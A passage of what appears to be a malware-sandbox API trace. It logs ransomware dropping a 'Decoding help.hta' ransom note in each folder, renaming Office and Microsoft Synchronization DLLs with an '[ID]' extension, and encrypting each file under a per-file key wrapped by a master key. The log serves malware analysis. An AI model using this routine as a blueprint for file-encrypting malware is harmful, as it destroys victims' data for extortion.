(lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\mapishellr.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\mapishellr.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.257] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\mapishellr.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0058.257] CreateFileMappingA (hFile=0x2bc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa48 [0058.257] CryptAcquireContextA (in: phProv=0xdd0fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xdd0fcec*=0x3448b60) returned 1 [0060.190] CryptGenKey (in: hProv=0x3448b60, Algid=0x6610, dwFlags=0x1, phKey=0xdd0fce8 | out: phKey=0xdd0fce8*=0x42cf558) returned 1 [0060.190] CryptExportKey (in: hKey=0x42cf558, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xdd0fbe4, pdwDataLen=0xdd0fce4 | out: pbData=0xdd0fbe4*, pdwDataLen=0xdd0fce4*=0x2c) returned 1 [0060.190] MapViewOfFile (hFileMappingObject=0xa48, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x907c0) returned 0xbf50000 [0063.717] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xdd0fbe4*, pdwDataLen=0xdd0fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xdd0fbe4*, pdwDataLen=0xdd0fcf8*=0x100) returned 1 [0063.717] CryptEncrypt (hKey=0x42cf558, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xbf50000, pdwDataLen=0xdd0fce4*=0x907c0, dwBufLen=0x907c0) Thread: id = 339 os_tid = 0x310 [0042.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\*.*", lpFindFileData=0xe08fd30 | out: lpFindFileData=0xe08fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x21c0d830, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x21c0d830, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6719f0 [0042.906] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.906] FindNextFileW (in: hFindFile=0x6719f0, lpFindFileData=0xe08fd30 | out: lpFindFileData=0xe08fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x21c0d830, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x21c0d830, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.906] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.906] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.907] FindNextFileW (in: hFindFile=0x6719f0, lpFindFileData=0xe08fd30 | out: lpFindFileData=0xe08fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x21c0d830, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x21c0d830, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x21c0d830, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x78e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0042.907] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\*.*" [0042.907] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\*.*") returned 39 [0042.907] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\Decoding help.hta" [0042.907] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\Decoding help.hta" (normalized: "c:\\users\\all users\\mozilla\\logs\\decoding help.hta")) returned 0x1 [0042.907] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Decoding help.hta") returned 0 [0042.907] FindNextFileW (in: hFindFile=0x6719f0, lpFindFileData=0xe08fd30 | out: lpFindFileData=0xe08fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb07822e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa4, dwReserved0=0x0, dwReserved1=0x0, cFileName="maintenanceservice-install.log.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="MAINTE~1._ID")) returned 1 [0042.907] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\*.*" [0042.907] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\*.*") returned 39 [0042.907] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\Decoding help.hta" [0042.907] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Mozilla\\logs\\Decoding help.hta" (normalized: "c:\\users\\all users\\mozilla\\logs\\decoding help.hta")) returned 0x1 [0042.907] lstrcmpiW (lpString1="Decoding help.hta", lpString2="maintenanceservice-install.log.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0042.907] lstrlenW (lpString="maintenanceservice-install.log.[ID]g9uZrLhJaygpwRm1[ID]") returned 55 [0042.907] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0042.907] FindNextFileW (in: hFindFile=0x6719f0, lpFindFileData=0xe08fd30 | out: lpFindFileData=0xe08fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb07822e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa4, dwReserved0=0x0, dwReserved1=0x0, cFileName="maintenanceservice-install.log.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="MAINTE~1._ID")) returned 0 [0042.907] FindClose (in: hFindFile=0x6719f0 | out: hFindFile=0x6719f0) returned 1 Thread: id = 340 os_tid = 0x318 [0042.920] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*", lpFindFileData=0xe58fd30 | out: lpFindFileData=0xe58fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a3248d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6716f0 [0042.957] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.957] FindNextFileW (in: hFindFile=0x6716f0, lpFindFileData=0xe58fd30 | out: lpFindFileData=0xe58fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6a3248d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.957] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.957] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.957] FindNextFileW (in: hFindFile=0x6716f0, lpFindFileData=0xe58fd30 | out: lpFindFileData=0xe58fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b72c500, ftCreationTime.dwHighDateTime=0x1c8bd0c, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b72c500, ftLastWriteTime.dwHighDateTime=0x1c8bd0c, nFileSizeHigh=0x0, nFileSizeLow=0x1c420, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Synchronization.Data.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0042.957] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*" [0042.957] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*") returned 72 [0042.957] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Decoding help.hta" [0042.957] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Decoding help.hta" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\decoding help.hta")) returned 0xffffffff [0042.957] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Decoding help.hta" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6a0 [0042.957] WriteFile (in: hFile=0x6a0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xe58fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xe58fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.958] CloseHandle (hObject=0x6a0) returned 1 [0042.958] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.959] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.Synchronization.Data.dll") returned -1 [0042.959] lstrlenW (lpString="Microsoft.Synchronization.Data.dll") returned 34 [0042.959] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0042.959] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*" [0042.959] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*") returned 72 [0042.959] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\", lpString2="Microsoft.Synchronization.Data.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.dll") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.dll" [0042.959] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.dll") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.dll" [0042.959] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.959] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.dll" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\microsoft.synchronization.data.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\microsoft.synchronization.data.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.960] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\microsoft.synchronization.data.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6a0 [0042.960] CreateFileMappingA (hFile=0x6a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6a4 [0042.960] CryptAcquireContextA (in: phProv=0xe58fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xe58fcec*=0x3448c70) returned 1 [0042.961] CryptGenKey (in: hProv=0x3448c70, Algid=0x6610, dwFlags=0x1, phKey=0xe58fce8 | out: phKey=0xe58fce8*=0x6715f0) returned 1 [0042.961] CryptExportKey (in: hKey=0x6715f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xe58fbe4, pdwDataLen=0xe58fce4 | out: pbData=0xe58fbe4*, pdwDataLen=0xe58fce4*=0x2c) returned 1 [0042.961] MapViewOfFile (hFileMappingObject=0x6a4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1c420) returned 0x8cb0000 [0042.972] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe58fbe4*, pdwDataLen=0xe58fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xe58fbe4*, pdwDataLen=0xe58fcf8*=0x100) returned 1 [0042.973] CryptEncrypt (in: hKey=0x6715f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8cb0000, pdwDataLen=0xe58fce4*=0x1c420, dwBufLen=0x1c420 | out: pbData=0x8cb0000*, pdwDataLen=0xe58fce4*=0x1c420) returned 1 [0042.997] UnmapViewOfFile (lpBaseAddress=0x8cb0000) returned 1 [0043.001] CloseHandle (hObject=0x6a4) returned 1 [0043.001] CryptDestroyKey (hKey=0x6715f0) returned 1 [0043.001] CryptReleaseContext (hProv=0x3448c70, dwFlags=0x0) returned 1 [0043.001] SetFilePointerEx (in: hFile=0x6a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.001] WriteFile (in: hFile=0x6a0, lpBuffer=0xe58fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe58fcf8, lpOverlapped=0x0 | out: lpBuffer=0xe58fbe4*, lpNumberOfBytesWritten=0xe58fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.002] WriteFile (in: hFile=0x6a0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xe58fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xe58fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.002] CloseHandle (hObject=0x6a0) returned 1 [0043.004] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.004] FindNextFileW (in: hFindFile=0x6716f0, lpFindFileData=0xe58fd30 | out: lpFindFileData=0xe58fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b72c500, ftCreationTime.dwHighDateTime=0x1c8bd0c, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6b72c500, ftLastWriteTime.dwHighDateTime=0x1c8bd0c, nFileSizeHigh=0x0, nFileSizeLow=0x1c420, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Synchronization.Data.Server.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0043.004] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*" [0043.004] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*") returned 72 [0043.004] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Decoding help.hta" [0043.004] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Decoding help.hta" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\decoding help.hta")) returned 0x1 [0043.004] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.Synchronization.Data.Server.dll") returned -1 [0043.004] lstrlenW (lpString="Microsoft.Synchronization.Data.Server.dll") returned 41 [0043.004] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0043.004] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*" [0043.004] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*") returned 72 [0043.004] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\", lpString2="Microsoft.Synchronization.Data.Server.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.Server.dll") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.Server.dll" [0043.004] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.Server.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.Server.dll") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.Server.dll" [0043.005] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.Server.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.Server.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.Server.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0043.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.Server.dll" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\microsoft.synchronization.data.server.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.Server.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\microsoft.synchronization.data.server.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.016] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.Server.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\microsoft.synchronization.data.server.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x700 [0043.016] CreateFileMappingA (hFile=0x700, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x69c [0043.016] CryptAcquireContextA (in: phProv=0xe58fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xe58fcec*=0x3448be8) returned 1 [0043.017] CryptGenKey (in: hProv=0x3448be8, Algid=0x6610, dwFlags=0x1, phKey=0xe58fce8 | out: phKey=0xe58fce8*=0x671970) returned 1 [0043.017] CryptExportKey (in: hKey=0x671970, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xe58fbe4, pdwDataLen=0xe58fce4 | out: pbData=0xe58fbe4*, pdwDataLen=0xe58fce4*=0x2c) returned 1 [0043.017] MapViewOfFile (hFileMappingObject=0x69c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1c420) returned 0x8b90000 [0043.039] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe58fbe4*, pdwDataLen=0xe58fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xe58fbe4*, pdwDataLen=0xe58fcf8*=0x100) returned 1 [0043.039] CryptEncrypt (in: hKey=0x671970, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8b90000, pdwDataLen=0xe58fce4*=0x1c420, dwBufLen=0x1c420 | out: pbData=0x8b90000*, pdwDataLen=0xe58fce4*=0x1c420) returned 1 [0043.059] UnmapViewOfFile (lpBaseAddress=0x8b90000) returned 1 [0043.061] CloseHandle (hObject=0x69c) returned 1 [0043.062] CryptDestroyKey (hKey=0x671970) returned 1 [0043.062] CryptReleaseContext (hProv=0x3448be8, dwFlags=0x0) returned 1 [0043.062] SetFilePointerEx (in: hFile=0x700, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.062] WriteFile (in: hFile=0x700, lpBuffer=0xe58fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe58fcf8, lpOverlapped=0x0 | out: lpBuffer=0xe58fbe4*, lpNumberOfBytesWritten=0xe58fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.063] WriteFile (in: hFile=0x700, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xe58fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xe58fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.063] CloseHandle (hObject=0x700) returned 1 [0043.066] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Microsoft.Synchronization.Data.Server.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.066] FindNextFileW (in: hFindFile=0x6716f0, lpFindFileData=0xe58fd30 | out: lpFindFileData=0xe58fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74481500, ftCreationTime.dwHighDateTime=0x1c8d683, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x74481500, ftLastWriteTime.dwHighDateTime=0x1c8d683, nFileSizeHigh=0x0, nFileSizeLow=0x17450, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Synchronization.Data.SqlServerCe.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0043.066] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*" [0043.066] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\*.*") returned 72 [0043.066] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Decoding help.hta" [0043.066] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\Decoding help.hta" (normalized: "c:\\program files\\microsoft synchronization services\\ado.net\\v1.0\\decoding help.hta")) returned 0x1 [0043.066] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.Synchronization.Data.SqlServerCe.dll") returned -1 [0043.066] lstrlenW (lpString="Microsoft.Synchronization.Data.SqlServerCe.dll") returned 46 [0043.066] 